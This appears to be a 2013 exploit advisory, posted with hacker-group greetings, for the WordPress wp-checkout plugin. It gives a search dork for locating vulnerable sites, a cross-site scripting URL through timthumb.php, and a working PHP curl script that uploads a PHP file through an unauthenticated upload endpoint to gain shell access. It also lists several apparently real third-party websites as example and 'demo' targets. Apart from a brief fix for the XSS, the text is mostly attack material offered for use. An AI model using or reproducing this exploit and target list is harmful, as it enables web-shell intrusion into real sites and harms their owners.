#Title : Wordpress Plugin wp-checkout XSS / Arbitrary File Upload

#Author : DevilScreaM

#Date : 10/31/2013

#Category : Web Applications

#Type : PHP

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
 	  Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Vulnerabillity : xss, Arbitrary File Upload

#Dork : 

inurl:wp-content/plugins/wp-checkout


Cross Site Scripting

http://site-target/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[XSS]

Example

http://osteopathywinchester.co.uk/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>DevilScreaM</h1>
http://pacificcrest.org/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>DevilScreaM</h1>


Solution

Upgrade Version Timthumb or Delete Files timthumb.php

=================================================================================================


Arbitrary File Upload


Exploit : http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php

<?php
  
$uploadfile="devilscream.php";
$ch = curl_init("http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wp-content/uploads/wp-checkout/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
  
print "$postResult";
?>


Shell Access : http://site-target/wp-content/uploads/wp-checkout/devilscream.php

Demo : 

http://prittybypri.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://windham73.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://twobuttons.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://riosdeaguavivaupci.com/hp_wordpress/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://brookesprevention.org/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://theheartofawoman.net/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php